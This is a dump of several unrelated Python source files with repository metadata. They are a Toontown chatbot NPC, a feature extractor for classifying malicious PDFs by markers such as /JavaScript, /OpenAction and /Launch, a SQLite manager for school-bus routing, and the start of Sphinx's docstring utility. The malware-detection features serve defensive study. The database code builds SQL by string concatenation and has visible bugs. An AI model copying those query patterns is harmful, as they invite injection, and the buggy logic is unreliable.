| 21.564417
| 81
| 0.547937
|
4a0a0b9b37ab6ea490b66f2a40b9d780c5d60546
| 2,834
|
py
|
Python
|
toontown/toon/DistributedSmartNPCAI.py
|
TrueBlueDogemon/Toontown
|
ebed7fc3f2ef06a529cf02eda7ab46361aceef9d
|
[
"MIT"
] | 1
|
2021-02-25T06:22:49.000Z
|
2021-02-25T06:22:49.000Z
|
toontown/toon/DistributedSmartNPCAI.py
|
TrueBlueDogemon/Toontown
|
ebed7fc3f2ef06a529cf02eda7ab46361aceef9d
|
[
"MIT"
] | null | null | null |
toontown/toon/DistributedSmartNPCAI.py
|
TrueBlueDogemon/Toontown
|
ebed7fc3f2ef06a529cf02eda7ab46361aceef9d
|
[
"MIT"
] | 2
|
2020-11-08T03:38:35.000Z
|
2021-09-02T07:03:47.000Z
|
from otp.ai.AIBaseGlobal import *
from direct.task.Task import Task
from pandac.PandaModules import *
from DistributedNPCToonBaseAI import *
from toontown.quest import Quests
import time
from QuestionMgr import ChatterBotFactory, ChatterBotType
from direct.task import Task
class DistributedSmartNPCAI(DistributedNPCToonBaseAI):
def __init__(self, air, npcId, questCallback = None, hq = 0):
DistributedNPCToonBaseAI.__init__(self, air, npcId, questCallback)
self.air = air
self.personOfInterest = 0
self.stopDouble = 0
self.nameOfInterest = ''
self.factory = ChatterBotFactory()
self.engine = self.factory.create(ChatterBotType.CLEVERBOT)
self.brain = self.engine.create_session()
self.myTask = taskMgr.doMethodLater(0.5, self.tylerTask, 'tylerTask')
self.index = 0
def tylerTask(self, task):
if task.time >= 5:
self.index = 0
if task.time <= 25:
return task.cont
self.response('I guess you don\'t want to talk anymore %s' % self.nameOfInterest + '...', self.personOfInterest)
self.stopDouble = self.personOfInterest
self.personOfInterest = 0
self.nameOfInterest = ''
return task.done
def restartTask(self):
taskMgr.remove(self.myTask)
taskMgr.add(self.myTask)
def avatarEnter(self):
if not self.personOfInterest:
sender = self.air.getAvatarIdFromSender()
if not sender == self.stopDouble:
name = self.air.doId2do.get(sender).getName()
self.personOfInterest = sender
self.nameOfInterest = name
self.sendUpdate('greet', [self.npcId, sender])
self.brain = self.engine.create_session()
else:
self.sendUpdate('dismiss', [sender, 2])
pass
else:
#Tyler is busy!
pass
def talkMessage(self, sender, message):
if sender == self.personOfInterest:
self.index += 1
if self.index >= 4:
self.stopDouble = self.personOfInterest
self.personOfInterest = 0
self.nameOfInterest = ''
taskMgr.remove(self.myTask)
self.index = 0
self.sendUpdate('dismiss', [sender, 1])
return
self.restartTask()
self.generateAnswer(message, sender)
def generateAnswer(self, message, sender):
name = self.air.doId2do.get(sender).getName()
answer = self.brain.think(message)
self.response(answer, sender)
def response(self, response, sendTo):
self.sendUpdate('respond', [self.npcId, response, sendTo])
self.restartTask()
| 36.333333
| 120
| 0.5988
|
4a0a0c0c6755ea5e814bd4a821452c2b051a2206
| 12,915
|
py
|
Python
|
classes/dataPDF.py
|
AUFinalProject/Phase5
|
540e6feee957679728ec0709da82eb93d00bed51
|
[
"MIT"
] | null | null | null |
classes/dataPDF.py
|
AUFinalProject/Phase5
|
540e6feee957679728ec0709da82eb93d00bed51
|
[
"MIT"
] | null | null | null |
classes/dataPDF.py
|
AUFinalProject/Phase5
|
540e6feee957679728ec0709da82eb93d00bed51
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------------------------------------------------------------------------------------------
# The our class for PDF files
# @Authors: Alexey Titov and Shir Bentabou
# @Version: 1.0
# -------------------------------------------------------------------------------------------------------------------------------------------------------------
# libraries
import numpy as np
import subprocess
import imutils
import cv2
import re
import os
import nltk
from nltk.corpus import stopwords
from bs4 import BeautifulSoup
import csv
# global lists
port_good = [":443/", ":80/", ":8080/"]
bad_word = ["target", "&", "?", "download", "php", "loader", "login", "=", "+"]
default_features = ["obj", "endobj", "stream", "endstream", "/ObjStm", "/JS", "/JavaScript", "/AA", "/Launch", "/OpenAction", "/AcroForm", "/RichMedia"]
# 0 1 2 3 4 5 6 7 11 8 9 10
# /ObjStm counts the number of object streams. An object stream is a stream object that can contain other objects, and can therefor be used to obfuscate objects (by using different filters).
# /JS and /JavaScript indicate that the PDF document contains JavaScript.
# Almost all malicious PDF documents that I've found in the wild contain JavaScript (to exploit a JavaScript vulnerability and/or to execute a heap spray).
# Of course, you can also find JavaScript in PDF documents without malicious intend.
# /AA and /OpenAction indicate an automatic action to be performed when the page/document is viewed.
# All malicious PDF documents with JavaScript I've seen in the wild had an automatic action to launch the JavaScript without user interaction.
# The combination of automatic action and JavaScript makes a PDF document very suspicious.
# /RichMedia can imply presence of flash file.
# /Launch counts launch actions.
# /AcroForm this tag is defined if a document contains form fields, and is true if it uses XML Forms Architecture; not a real Tag ID
# global variables
REPLACE_BY_SPACE_RE = re.compile('[/(){}\[\]\|@,;]')
BAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')
STOPWORDS = set(stopwords.words('english'))
class dataPDF:
__filename = "" # path to pdf file
__image = "" # path to image of pdf file
__text = "" # path to JavaScript from pdf file
__shortname = "" # name of pdf file
__histblur = [] # vector of color histogram and blur. Length = 513
__text_tfidf = "" # correct text from first page or vector for tfidf
__dsurlsjsentropy = [] # vector of tags, urls, JavaScript and entropy. Length = 32
__folder_path = "" # path to classes folder
__isjs_path = "JaSt-master/js/" # path for is_js.py code
__csv_path = ""
# constructor
def __init__(self, filename, folder_path, dataset):
self.__folder_path = folder_path + "classes/"
self.__isjs_path = folder_path + "classes/JaSt-master/js/"
self.__filename = folder_path + dataset + "/" + filename
self.__image = folder_path + "IMAGES/" + filename.replace('pdf', 'jpg')
self.__text = folder_path + "TEXTS/" + filename + ".txt"
self.__shortname = filename
self.__csv_path = folder_path + "pdfFILES.csv"
# this function extract color histogram for images
def extract_color_histogram(self, image, bins=(8, 8, 8)):
try:
# extract a 3D color histogram from the HSV color space using
# the supplied number of `bins` per channel
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,[0, 180, 0, 256, 0, 256])
# handle normalizing the histogram if we are using OpenCV 2.4.X
if imutils.is_cv2():
hist = cv2.normalize(hist)
# otherwise, perform "in place" normalization in OpenCV 3 (I
# personally hate the way this is done
else:
cv2.normalize(hist, hist)
# return the flattened histogram as the feature vector
return hist.flatten()
except Exception:
hist = list([-1]*512) # -1, error. Using the * operator for initialization
return hist
# this function detect blur
def detect_image_blur(self, imgPath):
try:
image = cv2.imread(imgPath)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
score = cv2.Laplacian(image, cv2.CV_64F).var()
detect = {score} # score < 110, an image is blur
return detect
except Exception:
detect = {-1} # -1, error
return detect
# calculate histogram and blur
def calculate_histogram_blur(self):
try:
# load the image and extract the class label (assuming that our
# path as the format: /path/to/dataset/{class}.{image_num}.jpg
image = cv2.imread(self.__image)
# histogram to characterize the color distribution of the pixels
# in the image
hist = self.extract_color_histogram(image)
# detect blur
blur = self.detect_image_blur(self.__image)
hist = list(hist) + list(blur)
self.__histblur = np.array(hist)
except Exception:
self.__histblur = list([-1]*513) # -1, error. Using the * operator for initialization
# this function clean text from garbage
def clean_text(self, text):
"""
text: a string
return: modified initial string
"""
text = BeautifulSoup(text, "lxml").text # HTML decoding
text = text.lower() # lowercase text
text = REPLACE_BY_SPACE_RE.sub(' ', text) # replace REPLACE_BY_SPACE_RE symbols by space in text
text = BAD_SYMBOLS_RE.sub('', text) # delete symbols which are in BAD_SYMBOLS_RE from text
text = ' '.join(word for word in text.split() if word not in STOPWORDS) # delete stopwors from text
return text
# this function save clean text from pdf file
def save_text(self, text):
self.__text_tfidf = self.clean_text(text)
with open(self.__csv_path, 'a') as csvFile:
fields = ['File', 'Text']
writer = csv.DictWriter(csvFile, fieldnames = fields)
row = [{'File': self.__shortname, 'Text':self.__text_tfidf}]
writer.writerows(row)
csvFile.close()
# function for part of JavaScript
# Sources:
# https://stackoverflow.com/questions/29342542/how-can-i-extract-a-javascript-from-a-pdf-file-with-a-command-line-tool
# js extraction code
# https://github.com/Aurore54F/JaSt
# JAST project
def pdfJS(self):
# variables for features
num_objects = 0
num_js_lines = 0
num_backslash = 0
num_evals = 0
num_slashx = 0
num_slashu0 = 0
type_js = 0 # no - 0, valid - 1, malformed - 2
encoding = 0
# handling the case that previous file failed to parse
errorfile = os.path.isfile(self.__text) # holds boolean value
if not errorfile:
print(self.__shortname + " failed parsing!")
features = [-1, -1, -1, -1, -1, -1, -1, -1]
return features
else:
temp_file = open(self.__text, 'r')
# copy content from temp file to text file
try:
for line in str(temp_file.readlines()):
if "// peepdf comment: Javascript code located in object" in line:
num_objects = num_objects + 1
elif line != '\n':
num_js_lines = num_js_lines + 1
# string literal for backslash
num_backslash = num_backslash + line.count("\\")
num_evals = num_evals + line.count("eval")
num_slashx = num_slashx + line.count("\\x")
num_slashu0 = num_slashu0 + line.count("\\u")
except:
encoding = -1
temp_file.close()
# check if valid JS or malformed JS
if num_js_lines != 0:
isjs = subprocess.Popen(['python', self.__isjs_path + "is_js.py", "--f", self.__text], stdout=subprocess.PIPE)
isjs.wait()
for line in isjs.stdout:
if "malformed" in str(line):
type_js = 2
elif " valid" in str(line):
type_js = 1
# save and print features
features = [num_objects, num_js_lines, num_backslash, num_evals, num_slashx, num_slashu0, type_js, encoding]
return features
# function for part of Entropy
# ans[0] - total_entropy; ans[1] - entropy_inside; ans[2] - entropy_outside
# Source: https://github.com/hiddenillusion/AnalyzePDF
def entropy(self):
try:
ans = []
p = subprocess.Popen(['python', self.__folder_path + 'AnalyzePDF-master/AnalyzePDF.py', self.__filename], stdout=subprocess.PIPE)
p.wait()
for (i, line) in enumerate(p.stdout):
line = str(line)
pattern = r"(\d+.\d+)"
num = re.search(pattern, line).group()
ans.append(float(num))
if(i == 2):
break
return ans
except Exception:
ex = [-1, -1, -1]
return ex
# function for part of pdfid.py
def defaultJS(self):
try:
ans = []
p = subprocess.Popen(['python', self.__folder_path + 'pdfid_v0_2_5/pdfid.py', self.__filename], stdout=subprocess.PIPE)
p.wait()
for line in p.stdout:
line = str(line)
if '%PDF' in line or line.startswith('PDFiD'):
continue
pattern1 = r"\s*(\S+)\s+(\d+)"
m = re.search(pattern1, line)
if m is not None:
key = m.group(1)
if key in default_features:
ans.append(int(m.group(2)))
return ans
except Exception:
ex = [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1]
return ex
# function for part of URLs
def URLs(self):
try:
p = subprocess.Popen(['python', self.__folder_path + 'support_union.py', self.__filename], stdout = subprocess.PIPE)
p.wait()
out, err = p.communicate()
out = str(out)
out = out.replace('b\'','').replace('\\n\'','').replace('[','').replace(']','').split(',')
if ('-1' in out[0]):
return list(map(int, out))
out = list(map(int, out))
return out
except Exception:
ex = [-1, -1, -1, -1, -1, -1, -1, -1, -1]
return ex
# this function calculate vector __dsurlsjsentropy
def calculate_dsurlsjsentropy(self):
# tags
ans = self.defaultJS()
# urls
urls = self.URLs()
# JavaScript
js = self.pdfJS()
# entropy
entropies = self.entropy()
# union
ans = ans + urls
ans = ans + js
ans = ans + entropies
self.__dsurlsjsentropy = np.array(ans)
# this function return filename
def getFilename(self):
return self.__filename
# this function return short filename
def getShortname(self):
return self.__shortname
# this function return path to image
def getImage(self):
return self.__image
# this function returns object histogram
def getImgHistogram(self):
return self.__histblur
# this function returns object feature vector
def getFeatVec(self):
return self.__dsurlsjsentropy
# this function returns object text
def getText(self):
return self.__text_tfidf
# print all information
def printData(self):
print(self.__filename)
print(self.__image)
print(self.__text)
print(self.__shortname)
print(self.__histblur)
print(self.__text_tfidf)
print(self.__dsurlsjsentropy)
| 42.483553
| 190
| 0.536895
|
4a0a0c45a5803962754651c062bb9a85a979f60d
| 26,007
|
py
|
Python
|
python/DBmanagement.py
|
billsioros/MMGP
|
d9cdd206e9baa4991ade1304dc4be53e1859b49d
|
[
"MIT"
] | null | null | null |
python/DBmanagement.py
|
billsioros/MMGP
|
d9cdd206e9baa4991ade1304dc4be53e1859b49d
|
[
"MIT"
] | null | null | null |
python/DBmanagement.py
|
billsioros/MMGP
|
d9cdd206e9baa4991ade1304dc4be53e1859b49d
|
[
"MIT"
] | null | null | null |
import sqlite3
import os
from time import sleep
from hashlib import sha1 as sha1
import util
import csv
cwd = os.getcwd()
class DBManager:
""" Connects to an sqlite3 database if it exists in current directory, or creates a new one
Connection = current connection """
def __init__(self, fileName, new=False, GoogleAPIKey=None, OpenAPIKey=None):
self.Connection = None
self.Cursor = None
if new:
if os.path.isfile(fileName):
os.remove(fileName)
print "Creating new Database..."
self.CreateDatabase(fileName)
else:
if not os.path.isfile(fileName):
raise IOError(fileName + " does not exist!")
self.FileName = fileName
self._GoogleAPIKey = GoogleAPIKey
self._OpenAPIKey = OpenAPIKey
self._MapsHandler = None
self._Parser = None
self.Connect(fileName)
def CreateDatabase(self, fileName):
self.Connect(fileName)
sql = "CREATE TABLE Student ( \
StudentID varchar(255), \
LastName varchar(255), \
FirstName varchar(255), \
AddressID varchar(255), \
Level varchar(255), \
Class varchar(255), \
Phone varchar(255), \
Mobile varchar(255), \
OtherPhone1 varchar(255), \
OtherPhone2 varchar(255), \
Primary Key (StudentID), \
Foreign Key (AddressID) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table Address ( \
AddressID varchar(255), \
Road varchar(255), \
Number varchar(255), \
ZipCode int, \
Prefecture varchar(255), \
Municipal varchar(255), \
Area varchar(255), \
GPS_X decimal(20, 14), \
GPS_Y decimal(20, 14), \
FullAddress varchar(255), \
TranslatedAddress varchar(255), \
FormattedAddress varchar(255), \
Primary Key (AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table Schedule ( \
ScheduleID varchar(255), \
StudentID varchar(255), \
AddressID varchar(255), \
Monday bit, \
Tuesday bit, \
Wednesday bit, \
Thursday bit, \
Friday bit, \
DayPart varchar(255), \
FullNote varchar(255), \
EarlyPickup varchar(255), \
LatePickup varchar(255), \
EarlyDrop varchar(255), \
LateDrop varchar(255), \
Around varchar(255), \
AltAddress varchar(255), \
Comment text, \
BusSchedule varchar(255), \
ScheduleOrder int, \
ScheduleTime varchar(255), \
Primary Key (ScheduleID), \
Foreign Key (AddressID) References Address(AddressID), \
Foreign Key (StudentID) References Student(StudentID) )"
self.Cursor.execute(sql)
sql = "Create Table MorningDistance ( \
AddressID_1 varchar(255), \
AddressID_2 varchar(255), \
Duration int, \
Distance int, \
Primary Key (AddressID_1, AddressID_2), \
Foreign Key (AddressID_1) References Address(AddressID), \
Foreign Key (AddressID_2) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table NoonDistance ( \
AddressID_1 varchar(255), \
AddressID_2 varchar(255), \
Duration int, \
Distance int, \
Primary Key (AddressID_1, AddressID_2), \
Foreign Key (AddressID_1) References Address(AddressID), \
Foreign Key (AddressID_2) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table StudyDistance ( \
AddressID_1 varchar(255), \
AddressID_2 varchar(255), \
Duration int, \
Distance int, \
Primary Key (AddressID_1, AddressID_2), \
Foreign Key (AddressID_1) References Address(AddressID), \
Foreign Key (AddressID_2) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table Bus ( \
BusID varchar(255), \
Number int, \
Capacity int, \
Primary Key (BusID) )"
self.Cursor.execute(sql)
sql = "Create Table Depot ( \
AddressID varchar(255), \
Road varchar(255), \
Number varchar(255), \
ZipCode int, \
Prefecture varchar(255), \
Municipal varchar(255), \
Area varchar(255), \
GPS_X decimal(20, 14), \
GPS_Y decimal(20, 14), \
FullAddress varchar(255), \
TranslatedAddress varchar(255), \
FormattedAddress varchar(255), \
Primary Key (AddressID) )"
self.Cursor.execute(sql)
self.Commit()
self.Disconnect()
return
def DestroyDatabase(self):
sql = "Drop Table Student"
self.Cursor.execute(sql)
sql = "Drop Table Address"
self.Cursor.execute(sql)
sql = "Drop Table Distance"
self.Cursor.execute(sql)
self.Connection.commit()
self.Connection.close()
os.remove(self.FileName)
return
def Connect(self, fileName):
if not self.Connection:
self.Connection = sqlite3.connect(fileName)
self.Cursor = self.Connection.cursor()
self.__InitRowFactory()
def Disconnect(self):
self.Connection.close()
self.Connection = None
self.Cursor = None
self.MapsHandler = None
self.FileName = None
self.GoogleAPIKey = None
self.OpenAPIKey = None
""" Note To Self:
Be sure to make Tables a double iterable of type (RowList, DayPart)"""
def InsertStudent(self, Tables, overwrite=False, GeoFailsFile=None):
requests = 0
# Pull Addresses from Database
Addresses = self.GetAddresses()
ExistingStudents = self.GetStudents()
# Delete the whole students table but not the addresses table - [Update]
# Check all the new students for previously found addresses - [New, Update]
# Insert those students with previously found address ID - [New, Update]
# Insert all students with new addresses (whether they have GPS coords or not) - [New, Update]
# Delete any address that is not connected to a student after the new entries finish being inserted - [Update]
self.Cursor.execute("Delete From Schedule")
if overwrite:
self.Cursor.execute("Delete From Address")
self.Cursor.execute("Delete From Student")
InsertedSchedules = dict()
# Tables is list of lists of Rows of Data
for RowList, DayPart in Tables:
NoGPS = list()
# Insert All Records that already have GPS coordinates
for Row in RowList:
# Concatenate the Address to a single string and hash it
FullAddress, TranslatedAddress = util.ConcatenateAddress(Row["Road"], Row["Num"], Row["ZipCode"], Row["Muni"], Row["Area"], Row["Prefec"], "GREECE")
HashAddress = self.__Hash(TranslatedAddress)
# If address has not been added to the database add it
if Row["GPSX"] and Row["GPSY"]:
if not Addresses.has_key(HashAddress):
# Decimals must be turned to strings
GPSX = str(Row["GPSX"])
GPSY = str(Row["GPSY"])
Addresses[HashAddress] = (GPSX, GPSY)
AddressList = [HashAddress, Row["Road"], Row["Num"], Row["ZipCode"], Row["Prefec"], Row["Muni"], Row["Area"], GPSX, GPSY, FullAddress, TranslatedAddress, None]
self.Cursor.execute("Insert Into Address \
Values (?,?,?,?,?,?,?,?,?,?,?,?)", AddressList)
# If there is no GPS coordinates add address to GeoCoding list and geocode it after
# all other addresses have been inserted. This way if an address is already in the database
# we do not have to geocode it. (Trying to reduce geocoding requests)
else:
NoGPS.append((Row["ID"], Row["LastName"], Row["FirstName"], HashAddress, \
Row["Road"], Row["Num"], Row["ZipCode"], Row["Prefec"], Row["Muni"], Row["Area"], TranslatedAddress, FullAddress))
# Add student to the database
# Format Some Values
if not ExistingStudents.has_key(Row["ID"]):
if Row["Class"]:
Row["Class"] = Row["Class"].replace('-', "")
Row["Class"].strip()
if Row["Class"] == "":
Row["Class"] = None
if Row["Phone"] != None:
Row["Phone"].strip(" ")
if Row["Phone"] == "":
Row["Phone"] = None
if Row["Mobile"] != None:
Row["Mobile"].strip(" ")
if Row["Mobile"] == "":
Row["Mobile"] = None
if Row["OtherPhone1"] != None:
Row["OtherPhone1"].strip(" ")
if Row["OtherPhone1"] == "":
Row["OtherPhone1"] = None
if Row["OtherPhone2"] != None:
Row["OtherPhone2"].strip(" ")
if Row["OtherPhone2"] == "":
Row["OtherPhone2"] = None
StudentList = [Row["ID"], Row["LastName"], Row["FirstName"], HashAddress, Row["Level"], Row["Class"],
Row["Phone"], Row["Mobile"], Row["OtherPhone1"], Row["OtherPhone2"]]
self.Cursor.execute("Insert Into Student \
Values (?,?,?,?,?,?,?,?,?,?)", StudentList)
ExistingStudents[Row["ID"]] = 1
if not InsertedSchedules.has_key(Row["ScheduleID"]):
if "Notes":
self.__InitParser()
NotesDict = self._Parser.Parse("Notes")
EarlyPickup = NotesDict["Early Pickup"]
LatePickup = NotesDict["Late Pickup"]
EarlyDrop = NotesDict["Early Drop"]
LateDrop = NotesDict["Late Drop"]
AltAddress = NotesDict["Address"]
Comment = NotesDict["Comments"]
Around = NotesDict["Around"]
else:
EarlyPickup = None
LatePickup = None
EarlyDrop = None
LateDrop = None
AltAddress = None
Comment = None
Around = None
ScheduleList = [Row["ScheduleID"], Row["ID"], HashAddress, Row["Mon"], Row["Tue"], Row["Wen"], Row["Thu"], Row["Fri"], DayPart,
Row["Notes"], EarlyPickup, LatePickup, EarlyDrop, LateDrop, Around, AltAddress, Comment,
Row["BusSchedule"], Row["ScheduleOrder"], Row["ScheduleTime"]]
self.Cursor.execute("Insert Into Schedule \
Values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", ScheduleList)
InsertedSchedules[Row["ScheduleID"]] = 1
# Insert All Records that do not have GPS coordinates
i = 0 # Geocoding per sec
for ID, LastName, FirstName, HashAddress, Road, Num, ZipCode, Prefec, Muni, Area, TranslatedAddress, FullAddress in NoGPS:
if not TranslatedAddress:
continue
# If address has not been added to the database, geocode it and add it
if not Addresses.has_key(HashAddress):
self.__InitMapsHandler()
# Only 10 requests per sec
if i == 10:
sleep(1) # Sleep 1 seconds for safety
i = 0
requests += 1
FormattedAddress, GPSX, GPSY = self._MapsHandler.Geocode(TranslatedAddress)
i += 1
valid = False
if FormattedAddress:
Addresses[HashAddress] = (GPSX, GPSY)
# Find Error and Log it into a csv of your choosing
valid = self.__LogGeocodingError(ID, LastName, FirstName, FormattedAddress, TranslatedAddress, DayPart, GeoFailsFile)
else:
valid = self.__LogGeocodingError(ID, LastName, FirstName, "None", TranslatedAddress, DayPart, GeoFailsFile)
if valid:
AddressList = [HashAddress, Road, Num, ZipCode, Prefec, Muni, Area, GPSX, GPSY, \
FullAddress, TranslatedAddress, FormattedAddress]
self.Cursor.execute("Insert Into Address \
Values (?,?,?,?,?,?,?,?,?,?,?,?)", AddressList)
self.__DiscardAddresses()
def InsertBus(self, RowList):
Buses = self.GetBuses()
for Bus in RowList:
ToAdd = [Bus["Code"], int(Bus["Number"]), Bus["Capacity"]]
if not Buses.has_key(Bus["Code"]):
self.Cursor.execute("Insert Into Bus \
Values (?,?,?)", ToAdd)
else:
self.Cursor.execute("Update Bus \
Set Number = ?, Capacity = ? \
Where BusID = ?", ToAdd)
def InsertDepot(self, RowList):
for Road, Number, ZipCode, Prefecture, Municipal, Area in RowList:
FullAddress, TranslatedAddress = util.ConcatenateAddress(Road, Number, ZipCode, Municipal, Area, Prefecture, "GREECE")
HashAddress = self.__Hash(TranslatedAddress)
self.__InitMapsHandler()
FormattedAddress, GPSX, GPSY = self._MapsHandler.Geocode(TranslatedAddress)
AddressList = [HashAddress, Road, Number, ZipCode, Prefecture, Municipal, Area, GPSX, GPSY,\
FullAddress, TranslatedAddress, FormattedAddress]
self.Cursor.execute("Insert Into Depot \
Values (?,?,?,?,?,?,?,?,?,?,?,?)", AddressList)
def InsertDistances(self, DayPart, direct=False, fileName=None):
if DayPart != "Morning" and DayPart != "Noon" and DayPart != "Study":
raise ValueError("Error: Non valid DayPart.")
Table = DayPart + "Distance"
self.Cursor.execute(\
" Select Address.AddressID, Address.GPS_X, Address.GPS_Y \
From Address \
Where exists ( Select * \
From Student, Schedule \
Where Schedule.AddressID = Address.AddressID and Student.StudentID = Schedule.StudentID \
and Schedule.DayPart = ?)", [DayPart])
Addresses = self.Cursor.fetchall()
Depot = self.GetDepot()
Addresses.append(Depot)
Origins = list()
for Address in Addresses:
Origins.append((Address["AddressID"], (Address["GPS_Y"], Address["GPS_X"])))
self.__InitMapsHandler()
Matrix = self._MapsHandler.DistanceMatrix(Origins)
if not direct:
if not fileName:
"Error: No file was given, writing on \"tempDistances.tsv\""
DatabaseDir = os.path.realpath(os.path.dirname(self.FileName))
fileName = DatabaseDir + "/tempDistances.tsv"
logcsv = open(fileName, "r")
if logcsv.readline():
logcsv.close()
logcsv = open(fileName, "a+")
else:
logcsv.close()
logcsv = open(fileName, "w+")
logcsv.write("DayPart\tID1\tID2\tDuration\tDistance\n")
for id1, id2, duration, distance in Matrix:
logcsv.write(DayPart + "\t" + str(id1) + "\t" + str(id2) + "\t" + str(duration) + "\t" + str(distance) + "\n")
logcsv.close()
else:
self.Cursor.execute("Delete From " + Table)
for id1, id2, duration, distance in Matrix:
# All previous distances will be overwritten
if not duration:
duration = 0
if not distance:
distance = 0
sql = "Insert into " + Table + " Values(\"" + str(id1) + "\", \"" + str(id2) + "\", " + str(duration) + ", " + str(distance) + ")"
self.Cursor.execute(sql)
def InsertDistancesFromFile(self, DayPart, fileName):
if DayPart != "Morning" and DayPart != "Noon" and DayPart != "Morning":
raise ValueError("Error: Non valid DayPart.")
if not os.path.isfile(fileName):
print "Error: File does not exist. Returning..."
return
Table = DayPart + "Distance"
with open(fileName) as distances:
readCSV = csv.DictReader(distances, delimiter='\t')
Rows = list()
for row in readCSV:
ID1 = row["ID1"]
ID2 = row["ID2"]
Duration = row["Duration"]
if row["Distance"]:
Distance = row["Distance"]
else:
Distance = None
Rows.append([ID1, ID2, Duration, Distance])
for id1, id2, duration, distance in Rows:
# All previous distances will be overwritten
self.Cursor.execute("Delete From ?", [Table])
sql = "Insert into " + Table + " Values('" + id1 + "', '" + id2 + "', " + duration + ", " + distance + ")"
self.Cursor.execute(sql)
def Commit(self):
if self.Connection:
self.Connection.commit()
def RollBack(self):
if self.Connection:
self.Connection.rollback()
def GetAddresses(self):
self.Connect(self.FileName)
sql = " Select AddressID, GPS_X, GPS_Y, FullAddress \
From Address"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Addresses = dict()
for Row in Rows:
Addresses[Row["AddressID"]] = Row
return Addresses
def GetBuses(self):
self.Connect(self.FileName)
sql = " Select * From Bus"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Buses = dict()
for Row in Rows:
Buses[Row["BusID"]] = Row
return Buses
def GetStudents(self):
self.Connect(self.FileName)
sql = "Select * From Student"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Students = dict()
for Row in Rows:
Students[Row["StudentID"]] = Row
return Students
def GetSchedules(self):
self.Connect(self.FileName)
sql = "Select * From Schedule"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Students = dict()
for Row in Rows:
Students[Row["ScheduleID"]] = Row
return Students
# Fix this!!
def GetDistances(self, DayPart):
self.Connect(self.FileName)
if DayPart != "Morning" and DayPart != "Noon" and DayPart != "Study":
raise ValueError("Error: Non valid DayPart.")
sql = "Select * From " + DayPart + "Distance"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Distances = {}
for ID1, ID2, Duration, Distance in Rows:
Distances[ID1] = {}
for ID1, ID2, Duration, Distance in Rows:
Distances[ID1][ID2] = (Duration, Distance)
return Distances
def GetDepot(self, AddressID=None):
self.Connect(self.FileName)
if AddressID:
sql = "Select AddressID, GPS_X, GPS_Y, FullAddress From Depot Where AddressID = \"" + AddressID +"\""
self.Cursor.execute(sql)
else:
self.Cursor.execute("Select AddressID, GPS_X, GPS_Y, FullAddress From Depot")
Depot = self.Cursor.fetchone()
return Depot
def CalculateDistance(self, AddressID_1, AddressID_2, DayPart):
self.Connect(self.FileName)
sql = "Select Duration, Distance From " + DayPart + "Distance Where AddressID_1 = \"" + AddressID_1 + "\" and AddressID_2 = \"" + AddressID_2 + "\""
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
if Rows:
return (Rows[0]["Distance"], Rows[0]["Duration"])
else:
return []
def Execute(self, sql):
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
return Rows
def __InitRowFactory(self):
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
self.Connection.row_factory = dict_factory
self.Cursor = self.Connection.cursor()
def __ResetRowFactory(self):
self.Disconnect()
self.Connect(self.FileName)
def __InitParser(self):
if not self._Parser:
self._Parser = util.Parser()
def __InitMapsHandler(self):
if not self._MapsHandler:
self._MapsHandler = util.MapsHandler(GoogleAPIKey=self._GoogleAPIKey, OpenAPIKey=self._OpenAPIKey)
def __DiscardAddresses(self):
self.Connect(self.FileName)
self.Cursor.execute("Select Address.AddressID \
From Address \
Where Not Exists \
(Select * From Student \
Where Student.AddressID = Address.AddressID)")
Addresses = self.Cursor.fetchall()
for Address in Addresses:
self.Cursor.execute("Delete From Address Where AddressID = ?", [Address["AddressID"]])
def __Hash(self, Address):
return sha1(Address).hexdigest()
def __LogGeocodingError(self, ID, LastName, FirstName, FormattedAddress, TranslatedAddress, DayPart, GeoFailsFile):
valid = True
if util.CountNumbers(FormattedAddress) <= 5:
if "&" not in FormattedAddress and " KAI " not in FormattedAddress:
valid = False
if GeoFailsFile:
LN = util.TranslateAddress(LastName)
FN = util.TranslateAddress(FirstName)
GeoFailsFile.write(str(ID) + "\t" + LN + "\t" + FN + "\t" + FormattedAddress + "\t"\
+ TranslatedAddress + "\t" + DayPart + "\n")
return valid
| 39.644817
| 183
| 0.471219
|
4a0a0df4944e8651a6c47f8c62dee081bb1a8126
| 2,241
|
py
|
Python
|
sphinx/util/docstrings.py
|
merwok-forks/sphinx
|
b7cada236f765003a73ab5dca48f975d54c0c298
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/util/docstrings.py
|
merwok-forks/sphinx
|
b7cada236f765003a73ab5dca48f975d54c0c298
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/util/docstrings.py
|
merwok-forks/sphinx
|
b7cada236f765003a73ab5dca48f975d54c0c298
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
sphinx.util.docstrings
~~~~~~~~~~~~~~~~~~~~~~
Utilities for docstring processing.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
if False:
# For type annotation
from typing import List # NOQA
def prepare_docstring(s, ignore=1):
# type: (unicode, int) -> List[unicode]
"""Convert a docstring into lines of parseable reST. Remove common leading
indentation, where the indentation of a given number of lines (usually just
one) is ignored.
Return the docstring as a list of lines usable for inserting into a docutils
ViewList (used as argument of nested_parse().) An empty line is added to
act as a separator between this docstring and following content.
"""
lines = s.expandtabs().splitlines()
# Find minimum indentation of any non-blank lines after ignored lines.
margin = sys.maxsize
